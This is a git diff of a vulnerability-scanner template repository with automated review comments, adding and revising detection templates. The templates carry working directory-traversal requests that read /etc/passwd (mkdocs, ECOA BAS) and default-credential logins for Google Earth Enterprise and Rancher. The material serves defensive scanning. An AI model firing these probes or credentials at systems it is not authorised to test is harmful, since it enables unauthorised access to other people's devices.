diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml
index 276fbcff83..cd23caa054 100644
--- a/cves/2018/CVE-2018-12998.yaml
+++ b/cves/2018/CVE-2018-12998.yaml
@@ -4,7 +4,7 @@ info:
name: Zoho manageengine Arbitrary Reflected XSS
author: pikpikcu
severity: medium
- description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
+ description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
reference:
- https://github.com/unh3x/just4cve/issues/10
- http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
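Review bot: while touching the description, the `name` on the unchanged context line above still reads "Zoho manageengine" with a lowercase product name; the vendor spells it "ManageEngine", and the new description already uses that form, so the two should agree. The description fix itself is fine.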
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
new file mode 100644
index 0000000000..2273074039
--- /dev/null
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-40978
+
+info:
+ name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+ author: pikpikcu
+ severity: high
+ reference:
+ - https://github.com/nisdn/CVE-2021-40978
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-40978
+ tags: cve,cve2021,mkdocs,lfi
+ description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
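Review bot: the description carries two typos that will ship as-is: a stray colon in "obtain :sensitive information" and a stray "]" after the mkdocs issue URL ("issues/2601.]"). Since the CVE is marked DISPUTED by the vendor, consider reflecting that in the severity or at least in the template name so consumers triaging `high` findings know the status up front. The `matchers:` key is also followed by an empty `+` line, which the other new templates in this diff do not do.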
diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/cves/2021/CVE-2021-41291.yaml
similarity index 59%
rename from vulnerabilities/other/ecoa-building-lfi.yaml
rename to cves/2021/CVE-2021-41291.yaml
index fcaa63183d..b0e8b161ea 100644
--- a/vulnerabilities/other/ecoa-building-lfi.yaml
+++ b/cves/2021/CVE-2021-41291.yaml
@@ -1,12 +1,19 @@
-id: ecoa-building-lfi
+id: CVE-2021-41291
info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
- reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- tags: ecoa,lfi
+ reference:
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+ - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
+ tags: cve,cve2021,ecoa,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-41291
+ cwe-id: CWE-22
requests:
- raw:
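Review bot: the description on the unchanged context line ends without a full stop ("...on the affected device"); worth fixing while the metadata is being reworked. The added classification is consistent: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` does compute to 7.5 and CWE-22 matches a directory traversal, and the rename keeps history because git detected the move.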
@@ -17,5 +24,4 @@ requests:
matchers:
- type: regex
regex:
- - "root:.*:0:0:"
- part: body
+ - "root:.*:0:0:"
\ No newline at end of file
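Review bot: this hunk drops the file's trailing newline while removing `part: body` (note the "\ No newline at end of file" marker), which the CVE-2021-41773 change elsewhere in this diff goes out of its way to fix; please keep the final newline. Removing `part: body` is behaviour-neutral as far as I can tell, since nuclei matchers default to the response body, so no objection to that part.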
diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml
new file mode 100644
index 0000000000..4a4c48e176
--- /dev/null
+++ b/cves/2021/CVE-2021-41293.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-41293
+
+info:
+ name: ECOA Building Automation System - LFD
+ author: 0x_Akoko
+ severity: high
+ description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
+ reference:
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
+ - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
+ tags: cve,cve2021,ecoa,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-41293
+ cwe-id: CWE-22
+
+requests:
+ - raw:
+ - |
+ POST /viewlog.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ yr=2021&mh=6&fname=../../../../../../../../etc/passwd
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
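Review bot: the raw POST at the top of the hunk sends a form-encoded body (`yr=2021&mh=6&fname=...`) but no `Content-Type` header; a JSP backend reading `request.getParameter("fname")` only parses the body when the request carries `Content-Type: application/x-www-form-urlencoded`, so add that header or the detection may silently never fire. The status matcher plus the `root:.*:0:0` regex is otherwise a reasonable pairing, and the classification block matches the sibling CVE-2021-41291 template.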
diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml
index e82bbd6bef..473c7adbcb 100644
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-41773
info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
- severity: critical
+ severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
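Review bot: the severity downgrade from `critical` to `high` should be justified in the commit message, because the template's `name` still advertises "Remote Code Execution" and the description says the issue is exploited in the wild. The 7.5 CVSS vector added further down (C:H/I:N/A:N) scores the file-read impact only, so `high` is consistent with that classification; if the RCE matcher is kept, say explicitly that the severity tracks the CVSS rather than the worst-case matcher.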
@@ -12,6 +12,13 @@ info:
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
tags: cve,cve2021,lfi,rce,apache,misconfig
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
requests:
- raw:
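Review bot: the new `metadata` block uses the key `shodan-query`, while the Google Earth template added in this same diff uses `shodan-dork`; pick one key name across the PR so downstream tooling that reads metadata does not have to special-case both. The classification values themselves look right for CVE-2021-41773.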
@@ -37,4 +44,4 @@ requests:
- type: word
name: RCE
words:
- - "CVE-2021-41773"
\ No newline at end of file
+ - "CVE-2021-41773"
diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml
new file mode 100644
index 0000000000..9826c42eb0
--- /dev/null
+++ b/default-logins/google/google-earth-dlogin.yaml
@@ -0,0 +1,37 @@
+id: google-earth-dlogin
+
+info:
+ name: Google Earth Enterprise Default Login
+ author: orpheus,johnjhacking
+ severity: high
+ tags: default-login,google
+ reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
+ metadata:
+ shodan-dork: 'title:"GEE Server"'
+
+requests:
+ - raw:
+ - |
+ GET /admin/ HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ attack: pitchfork
+ payloads:
+ username:
+ - geapacheuser
+
+ password:
+ - geeadmin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ condition: and
+ words:
+ - 'DashboardPanel'
+ - 'Earth Enterprise Server'
\ No newline at end of file
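Review bot: the new file is committed without a trailing newline (see the "\ No newline at end of file" marker) and uses `shodan-dork` where the other templates in this diff use `shodan-query`; both are easy to fix before merge. The template also has no `description`, unlike the other default-login template added here, and `attack: pitchfork` with a single username/password pair is fine but could simply be a single raw request with the literal credentials.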
diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml
new file mode 100644
index 0000000000..9eadc6d68c
--- /dev/null
+++ b/default-logins/rancher/rancher-default-login.yaml
@@ -0,0 +1,52 @@
+id: rancher-default-login
+
+info:
+ name: Rancher Default Login
+ author: princechaddha
+ severity: high
+ description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
+ reference: https://github.com/rancher/rancher
+ tags: default-login,rancher,kubernetes,devops,cloud
+
+requests:
+ - raw:
+ - |
+ GET /v3/settings/first-login HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
+
+ - |
+ POST /v3-public/localProviders/local?action=login HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: CSRF={{csrf}}
+ X-Api-Csrf: {{csrf}}
+ Connection: close
+ Content-Length: 136
+
+ {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
+
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'R_SESS=token'
+ part: header
+
+ extractors:
+ - type: regex
+ name: csrf
+ group: 1
+ internal: true
+ part: header
+ regex:
+ - 'Set-Cookie: CSRF=([a-z0-9]+)'
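Review bot: the hard-coded `Content-Length: 136` in the second raw request does not match the rendered body. With `admin`/`admin` substituted the JSON body is 121 bytes; 136 only corresponds to the unrendered `{{username}}`/`{{password}}` placeholders plus a newline. Drop the header and let the engine set the length. Also, the description has a grammar slip ("is a open-source ... platform, lets operations teams"), and the same sentence is copied verbatim into `exposed-panels/rancher-panel.yaml`, so fix it in both places.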
diff --git a/exposed-panels/netscalar-aaa-login.yaml b/exposed-panels/netscaler-aaa-login.yaml
similarity index 84%
rename from exposed-panels/netscalar-aaa-login.yaml
rename to exposed-panels/netscaler-aaa-login.yaml
index 1f8c66d7b3..c0b77f5fc7 100644
--- a/exposed-panels/netscalar-aaa-login.yaml
+++ b/exposed-panels/netscaler-aaa-login.yaml
@@ -1,7 +1,7 @@
-id: netscalar-aaa-login
+id: netscaler-aaa-login
info:
- name: NetScalar AAA Login Panel
+ name: NetScaler AAA Login Panel
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6898
diff --git a/exposed-panels/rancher-panel.yaml b/exposed-panels/rancher-panel.yaml
new file mode 100644
index 0000000000..f7eae0a56f
--- /dev/null
+++ b/exposed-panels/rancher-panel.yaml
@@ -0,0 +1,34 @@
+id: rancher-panel
+
+info:
+ name: Rancher Login Panel
+ author: princechaddha
+ severity: info
+ description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
+ reference: https://github.com/rancher/rancher
+ tags: panel,rancher,kubernetes,devops,cloud
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
Loading…"
+ - "global-admin/config/environment"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ''
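Review bot: two matcher/extractor values in this hunk look damaged and should be checked against the committed file: the first `words` entry is split across two lines (`- "` then `Loading…"`), which YAML folds into `" Loading…"` with a leading space, and the extractor `regex` is the empty string `''`, which with `group: 1` has no capture group to extract. Both read as if an HTML tag was stripped; if that is the real content and not a rendering artifact, the markup needs restoring. The description also repeats the grammar slip from the Rancher default-login template.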
diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml
new file mode 100644
index 0000000000..13b5e6706b
--- /dev/null
+++ b/misconfiguration/hpe-system-management-anonymous.yaml
@@ -0,0 +1,21 @@
+id: hpe-system-management-anonymous-access
+
+info:
+ name: HPE System Management Anonymous Access
+ author: divya_mudgal
+ severity: low
+ tags: hp,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/chpstrt.php?chppath=Home"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ words:
+ - "username = \"hpsmh_anonymous\";"
+ - "var host_addr = '"
+ - "var ip_addr = '"
\ No newline at end of file
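Review bot: the template `id` (`hpe-system-management-anonymous-access`) does not match the filename (`hpe-system-management-anonymous.yaml`); the repository convention is for the two to be identical, so one of them should change. There is also no `description` or `reference`, no `status` matcher to pair with the word matcher, and the file lacks a trailing newline.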
diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml
index 168a3b1f53..ba239b67f4 100644
--- a/technologies/confluence-detect.yaml
+++ b/technologies/confluence-detect.yaml
@@ -5,7 +5,9 @@ info:
author: philippedelteil
severity: info
description: Allows you to detect Atlassian Confluence instances
- tags: tech,confluence
+ tags: tech,confluence,atlassian
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22
requests:
- method: GET
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index a8bb4d5847..0c1f84d566 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -20,3 +20,4 @@ requests:
negative: true
words:
- 'BadApiKey'
+ - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve
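Review bot: the inline `# Matchers needs to be replaced ...` comment is a TODO that belongs in a tracking issue rather than in the shipped template. The logic of the change is sound: with the default `or` word condition, `negative: true` now only matches when neither `BadApiKey` nor `RateLimitExceeded` appears, so a rate-limited response is no longer reported as a valid key.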
diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml
index 4b8022a318..b56424baca 100644
--- a/vulnerabilities/other/bitrix-open-redirect.yaml
+++ b/vulnerabilities/other/bitrix-open-redirect.yaml
@@ -4,12 +4,12 @@ info:
name: Bitrix Open URL redirect detection
author: pikpikcu
severity: low
+ description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
tags: redirect,bitrix
requests:
- method: GET
-
path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
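Review bot: the new description names the product as "The Bitrix Russia Site Management 2.0", but the referenced advisory title is "1C-Bitrix Site Management Russia 2.0"; use the vendor's product name. Removing the stray blank line inside the request block is fine.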
@@ -33,7 +33,7 @@ requests:
part: header
- type: status
+ condition: or
status:
- 302
- - 301
- condition: or
+ - 301
\ No newline at end of file
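Review bot: moving `condition: or` above `status:` is a harmless reorder, but the hunk re-adds `- 301` without the file's trailing newline (see the "\ No newline at end of file" marker), a regression the CVE-2021-41773 change in this same diff fixes in the other direction; restore the final newline.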
diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
index dfdc0ae4a8..dd820dfb22 100644
--- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml
+++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
@@ -4,7 +4,7 @@ info:
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
author: gy741
severity: critical
- description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+ description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
reference:
- https://www.exploit-db.com/exploits/50206
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
index c03a8be40a..16884d7384 100644
--- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
+++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
@@ -4,6 +4,7 @@ info:
name: DedeCmsV5.6 Carbuyaction Fileinclude
author: pikpikcu
severity: high
+ description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference: https://www.cnblogs.com/milantgh/p/3615986.html
tags: dedecms
diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml
index 4100d95baa..1adc04596d 100644
--- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml
+++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml
@@ -4,6 +4,7 @@ info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
+ description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml
deleted file mode 100644
index 24d0554968..0000000000
--- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: ecoa-building-automation-lfd
-info:
- name: ECOA Building Automation System - LFD
- author: 0x_Akoko
- severity: high
- reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- tags: ecoa,lfi
-
-requests:
- - raw:
- - |
- POST /viewlog.jsp HTTP/1.1
- Host: {{Hostname}}
-
- yr=2021&mh=6&fname=../../../../../../../../etc/passwd
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
- condition: and
-
- - type: status
- status:
- - 200
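Review bot: this deletion is really a move of `ecoa-building-automation-lfd.yaml` to `cves/2021/CVE-2021-41293.yaml`, but because the new file was rewritten rather than renamed, git shows it as delete plus add and the template's history is lost; the sibling `ecoa-building-lfi.yaml` change in this diff was done as a rename and kept its history, so do the same here. The one content change, dropping the meaningless `condition: and` on a single-regex matcher, is correct.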
diff --git a/vulnerabilities/other/fatpipe-backdoor.yaml b/vulnerabilities/other/fatpipe-backdoor.yaml
index dd1ccac475..98e6e53d22 100644
--- a/vulnerabilities/other/fatpipe-backdoor.yaml
+++ b/vulnerabilities/other/fatpipe-backdoor.yaml
@@ -4,7 +4,7 @@ info:
name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
author: gy741
severity: high
- description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
+ description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
- https://www.fatpipeinc.com/support/advisories.php
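Review bot: "FatPipe Networks has a hidden administrative account" names the vendor, not the product; the `name` line above already identifies the affected products (WARP/IPVPN/MPVPN 10.2.2), so the description should say something like "FatPipe WARP, IPVPN and MPVPN 10.2.2 contain a hidden administrative account cmuser ...". "in Users menu list" also wants an article ("in the Users menu").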
diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
index 8e4768db23..c0e7dbfcad 100644
--- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
@@ -4,7 +4,8 @@ info:
name: GeoVision Geowebserver 5.3.3 - LFI
author: madrobot
severity: high
- reference: https://www.exploit-db.com/exploits/50211
+ description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
+ reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
tags: geowebserver,lfi
requests:
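Review bot: the exploit-db reference is replaced rather than supplemented; the Packet Storm advisory is the better primary source, but keep `https://www.exploit-db.com/exploits/50211` as a second entry in a `reference:` list so the original provenance survives. Same comment applies to the GeoVision XSS template below.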
diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml
index f9c3d234be..a047ed5e8b 100644
--- a/vulnerabilities/other/geovision-geowebserver-xss.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml
@@ -4,7 +4,8 @@ info:
name: GeoVision Geowebserver 5.3.3 - XSS
author: madrobot
severity: medium
- reference: https://www.exploit-db.com/exploits/50211
+ description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
+ reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
tags: geowebserver,xss
requests:
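Review bot: `=<` in the description should be `<=` (or "5.3.3 and earlier"), and "GEOVISION GEOWEBSERVER" should match the casing used in the `name` line. As with the LFI template, the exploit-db reference should be kept alongside the new Packet Storm link rather than dropped.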
diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml
index 470a86869d..2c0133a076 100644
--- a/vulnerabilities/other/h3c-imc-rce.yaml
+++ b/vulnerabilities/other/h3c-imc-rce.yaml
@@ -1,9 +1,10 @@
id: h3c-imc-rce
info:
- name: H3c IMC Rce
+ name: H3c IMC RCE
author: pikpikcu
severity: critical
+ description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
tags: rce,h3c-imc
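Review bot: the new description ends without a full stop ("...via the 'dynamiccontent.properties.xhtml' endpoint"); the other descriptions added in this diff are terminated, so this one should be too. The `name` capitalisation fix is fine.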
diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
index 98bcfbc283..00d5756dd4 100644
--- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml
+++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
@@ -4,6 +4,7 @@ info:
author: Udyz
name: Hasura GraphQL Engine - postgresql query exec
severity: critical
+ description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
reference: https://www.exploit-db.com/exploits/49802
tags: hasura,rce
diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml
index 6765dc8577..10df9f9c37 100644
--- a/vulnerabilities/other/hiboss-rce.yaml
+++ b/vulnerabilities/other/hiboss-rce.yaml
@@ -4,6 +4,7 @@ info:
name: Hiboss RCE
author: pikpikcu
severity: critical
+ description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
tags: hiboss,rce
diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml
index 8d8787781f..d2ca25b0c4 100644
--- a/vulnerabilities/other/karel-ip-phone-lfi.yaml
+++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
author: 0x_Akoko
severity: high
+ description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml
index 9cfa7fac56..bb9688eb93 100644
--- a/vulnerabilities/other/netis-info-leak.yaml
+++ b/vulnerabilities/other/netis-info-leak.yaml
@@ -5,6 +5,7 @@ info:
author: gy741
severity: medium
reference: https://www.exploit-db.com/exploits/48384
+ description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
tags: netis,exposure
requests:
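Review bot: `description` is inserted after `reference` here, whereas every other template touched in this diff places it before `reference`; move it up for consistency. "in Netis" should also name the affected product rather than only the vendor.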
diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
index 05bb45755f..efc4f25bce 100644
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@@ -4,6 +4,7 @@ info:
name: Nginx Merge Slashes Path Traversal
author: dhiyaneshDk
severity: medium
+ description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
- https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
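Review bot: the new description is garbled ("merge slashslash together causing what should have protected the web site ... into a vulnerable server") and does not state the actual condition. Per the referenced write-up, nginx's `merge_slashes` directive is on by default and collapses `//` in request paths, which shields upstream applications from some traversal inputs; a server that has turned it off passes those paths through unchanged. The description should say that plainly.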
diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml
index c6e5e91adf..f2584939c4 100644
--- a/vulnerabilities/other/opensis-lfi.yaml
+++ b/vulnerabilities/other/opensis-lfi.yaml
@@ -4,9 +4,9 @@ info:
name: openSIS 5.1 - 'ajax.php' Local File Inclusion
author: pikpikcu
severity: high
+ description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
reference:
- https://www.exploit-db.com/exploits/38039
- - https://www.securityfocus.com/bid/56598/info
tags: opensis,lfi
requests:
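Review bot: the securityfocus.com reference is removed outright; if it was dropped because the site is no longer available, say so in the commit message, since the new description is lifted nearly verbatim from that BID entry and loses its attribution otherwise. Consider keeping it as a historical reference.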
diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
index de51dfbd25..27dc936559 100644
--- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
+++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
+ description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it.
reference: https://cxsecurity.com/issue/WLB-2020030185
tags: wordpress,wp-theme,redirect
diff --git a/vulnerabilities/wordpress/brandfolder-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml
index 54d3abbe1b..2cb1f03bf0 100644
--- a/vulnerabilities/wordpress/brandfolder-lfi.yaml
+++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: Wordpress brandfolder plugin - RFI & LFI
author: 0x_Akoko
severity: high
+ description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
reference:
- https://www.exploit-db.com/exploits/39591
- https://cxsecurity.com/issue/WLB-2016030120
